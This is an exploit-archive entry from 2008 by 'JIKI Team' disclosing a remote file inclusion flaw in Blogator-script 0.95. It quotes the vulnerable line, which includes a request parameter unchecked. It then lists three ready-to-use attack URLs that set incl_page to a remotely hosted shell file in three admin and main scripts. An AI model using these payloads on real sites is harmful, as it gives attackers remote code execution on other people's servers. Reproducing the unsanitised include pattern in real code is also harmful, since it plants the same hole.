[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Blogator-script 0.95 (incl_page) Remote File Inclusion Vulnerability
# Published : 2008-04-04
# Author : JiKo
# Previous Title : PHP Photo Gallery 1.0 (photo_id) SQL Injection Vulnerability
# Next Title : PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] ---
-------------------------------------------------------------------------
# Author : jiko
# email : jalikom@hotmail.com
# Home : www.no-back.org
# Script : Blogator-script Version 2
# Bug : Remote File Inclusion
# Download : http://www.blogator-script.com/telecharger.php
# file : struct_admin.php & struct_admin_blog.php & struct_main.php
# Eror :
<? include($incl_page); ?>
=========================JIkI Team===================
# Exploit :
http://localhost/[script]/_blogadata/include/struct_admin.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_admin_blog.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://localhost/shell.txt?
=========================JIKI Team===================
greetz : all my friend and H-T Team
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] --
-------------------------------------------------------------------------
# www.Syue.com [2008-04-04]